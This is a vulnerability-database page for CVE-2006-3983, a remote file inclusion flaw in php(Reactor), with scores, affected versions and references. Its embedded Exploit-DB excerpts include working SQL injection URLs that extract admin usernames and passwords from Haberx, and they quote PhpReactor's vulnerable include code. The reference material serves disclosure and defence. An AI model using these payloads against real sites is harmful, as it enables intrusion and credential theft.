CVE-2006-3983
Published 2006-08-05
CVE-2006-3983: PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the…
Priority P343 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.43% (82.2th percentile)
PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ekilat_llc | php | — | — |
| phpreactor | phpreactor | <= 1.2.7 | — |
GHSA
GHSA-6hhc-q66q-7rp2: PHP remote file inclusion vulnerability in editprofile
ghsa_unreviewed·2022-05-01
CVE-2006-3983 [HIGH] GHSA-6hhc-q66q-7rp2: PHP remote file inclusion vulnerability in editprofile
PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter.
GHSA
GHSA-q45m-2998-2qff: Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3066 [HIGH] GHSA-q45m-2998-2qff: Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1
Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1.2.7 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter to (1) view.inc.php, (2) users.inc.php, (3) updatecms.inc.php, and (4) polls.inc.php in inc/; and other unspecified files, different vectors than CVE-2006-3983.
No detection rules found.
Exploit-DB
Haberx 1.02 < 1.1 - 'tr' SQL Injection
exploitdb·2006-09-15
CVE-2006-4853 Haberx 1.02 < 1.1 - 'tr' SQL Injection
---
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In : kategorix.asp
+ Risk : High
+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1
+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
# milw0rm.com [2006-09-15]
Exploit-DB
PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
exploitdb·2006-07-31
CVE-2006-3983 PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
---
########################### www.system-defacers.org ###############
# Found By CeNGiZ-HaN [email protected]
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
# Vulnerable Code in editprofile.php
# //INCLUDE DB FUNCTIONS
# if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
# //INCLUDE LANGUAGE FUNCTIONS
# if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
# //INCLUDE USERS FUNCTIONS
# if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
# //INCLUDE BBS FUNCTIONS
# if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"
No writeups or analysis indexed.
http://www.securityfocus.com/bid/19259
http://www.vupen.com/english/advisories/2006/3087
https://exchange.xforce.ibmcloud.com/vulnerabilities/28100
https://www.exploit-db.com/exploits/2095
2006-08-05
Published